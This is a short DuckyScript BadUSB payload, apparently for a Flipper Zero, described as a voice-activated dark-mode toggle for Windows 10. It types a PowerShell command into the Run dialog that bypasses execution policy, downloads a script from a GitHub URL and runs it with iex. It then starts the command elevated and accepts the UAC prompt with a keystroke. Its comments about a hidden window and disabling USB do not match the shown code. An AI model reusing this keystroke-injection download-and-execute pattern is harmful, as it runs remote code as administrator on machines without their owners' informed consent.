REM Title: Voice-Activated-DarkMode
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Control Windows theme with your voice. Say 'Light' OR 'Dark' to change theme.
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Voice-Activated-DarkMode/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y
